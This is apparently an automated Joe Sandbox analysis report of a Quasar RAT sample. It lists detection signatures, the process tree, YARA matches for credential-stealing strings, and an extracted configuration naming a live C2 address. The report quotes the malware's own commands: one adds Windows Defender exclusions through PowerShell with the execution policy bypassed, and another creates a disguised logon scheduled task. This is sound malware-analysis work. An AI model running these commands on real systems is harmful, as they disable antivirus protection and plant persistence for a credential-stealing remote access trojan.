Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
Analysis ID:1611954
MD5:08470c644b61ed4b473020eb6c455908
SHA1:737ac06d28a5c7760a1407b9b0cb7113030ce4b7
SHA256:be0d150d8ba2b3d607c23fac6aff6caf97525565f392e9daf3dd1baaabfcf447
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Quasar RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe" MD5: 08470C644B61ED4B473020EB6C455908)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7708 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8016 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • mmytljldrgl.exe (PID: 3156 cmdline: "C:\WCTVN\mmytljldrgl.exe" MD5: 766E053D13E4F6750E8F694EFB00FAD0)
      • schtasks.exe (PID: 4228 cmdline: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Client.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\SubDir\Client.exe" MD5: 766E053D13E4F6750E8F694EFB00FAD0)
        • schtasks.exe (PID: 7440 cmdline: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Client.exe (PID: 7424 cmdline: C:\Users\user\AppData\Roaming\SubDir\Client.exe MD5: 766E053D13E4F6750E8F694EFB00FAD0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Version": "1.4.1", "Host:Port": "87.228.57.81:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "cf3988ab-2fd9-4544-a16f-9faa71eb5bac", "StartupKey": "svchoost.exe", "Tag": "githubyt", "LogDirectoryName": "Logs", "ServerSignature": "SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw="}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
    • 0x28ef4b:$x1: Quasar.Common.Messages
    • 0x29f274:$x1: Quasar.Common.Messages
    • 0x2ab832:$x4: Uninstalling... good bye :-(
    • 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
    • 0x2aade4:$f1: FileZilla\recentservers.xml
    • 0x2aae24:$f2: FileZilla\sitemanager.xml
    • 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
    • 0x2ab0b2:$b1: Chrome\User Data\
    • 0x2ab108:$b1: Chrome\User Data\
    • 0x2ab3e0:$b2: Mozilla\Firefox\Profiles
    • 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    • 0x2ab634:$b4: Opera Software\Opera Stable\Login Data
    • 0x2ab6ee:$b5: YandexBrowser\User Data\
    • 0x2ab75c:$b5: YandexBrowser\User Data\
    • 0x2ab430:$s4: logins.json
    • 0x2ab166:$a1: username_value
    • 0x2ab184:$a2: password_value
    • 0x2ab470:$a3: encryptedUsername
    • 0x2fd37c:$a3: encryptedUsername
    • 0x2ab494:$a4: encryptedPassword
    • 0x2fd39a:$a4: encryptedPassword
    • 0x2fd318:$a5: httpRealm
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
    • 0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
    • 0x2ab91c:$s3: Process already elevated.
    • 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords
    • 0x278ccc:$s5: GetKeyloggerLogsDirectory
    • 0x29e9d3:$s5: GetKeyloggerLogsDirectory
    • 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords
    • 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
    C:\Users\user\AppData\Roaming\SubDir\Client.exeJoeSecurity_QuasarYara detected Quasar RATJoe Security
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
              Process Memory Space: mmytljldrgl.exe PID: 3156JoeSecurity_QuasarYara detected Quasar RATJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                24.0.mmytljldrgl.exe.450000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  24.0.mmytljldrgl.exe.450000.0.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                  • 0x28ef4b:$x1: Quasar.Common.Messages
                  • 0x29f274:$x1: Quasar.Common.Messages
                  • 0x2ab832:$x4: Uninstalling... good bye :-(
                  • 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                  24.0.mmytljldrgl.exe.450000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                  • 0x2aade4:$f1: FileZilla\recentservers.xml
                  • 0x2aae24:$f2: FileZilla\sitemanager.xml
                  • 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                  • 0x2ab0b2:$b1: Chrome\User Data\
                  • 0x2ab108:$b1: Chrome\User Data\
                  • 0x2ab3e0:$b2: Mozilla\Firefox\Profiles
                  • 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • 0x2ab634:$b4: Opera Software\Opera Stable\Login Data
                  • 0x2ab6ee:$b5: YandexBrowser\User Data\
                  • 0x2ab75c:$b5: YandexBrowser\User Data\
                  • 0x2ab430:$s4: logins.json
                  • 0x2ab166:$a1: username_value
                  • 0x2ab184:$a2: password_value
                  • 0x2ab470:$a3: encryptedUsername
                  • 0x2fd37c:$a3: encryptedUsername
                  • 0x2ab494:$a4: encryptedPassword
                  • 0x2fd39a:$a4: encryptedPassword
                  • 0x2fd318:$a5: httpRealm
                  24.0.mmytljldrgl.exe.450000.0.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
                  • 0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
                  • 0x2ab91c:$s3: Process already elevated.
                  • 0x28ec4a:$s4: get_PotentiallyVulnerablePasswords
                  • 0x278ccc:$s5: GetKeyloggerLogsDirectory
                  • 0x29e9d3:$s5: GetKeyloggerLogsDirectory
                  • 0x28ec6d:$s6: set_PotentiallyVulnerablePasswords
                  • 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ParentProcessId: 7316, ParentProcessName: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7692, ProcessName: cmd.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7708, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ParentProcessId: 7316, ParentProcessName: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7692, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\Client.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\Client.exe, ParentProcessId: 7328, ParentProcessName: Client.exe, ProcessCommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 7440, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\WCTVN\mmytljldrgl.exe" , ParentImage: C:\WCTVN\mmytljldrgl.exe, ParentProcessId: 3156, ParentProcessName: mmytljldrgl.exe, ProcessCommandLine: "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f, ProcessId: 4228, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\WCTVN'", ProcessId: 7708, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-11T11:04:22.162706+010020355951Domain Observed Used for C2 Detected87.228.57.814782192.168.2.449739TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                  Source: C:\WCTVN\mmytljldrgl.exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeAvira: detection malicious, Label: HEUR/AGEN.1307453
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "87.228.57.81:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "cf3988ab-2fd9-4544-a16f-9faa71eb5bac", "StartupKey": "svchoost.exe", "Tag": "githubyt", "LogDirectoryName": "Logs", "ServerSignature": "SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7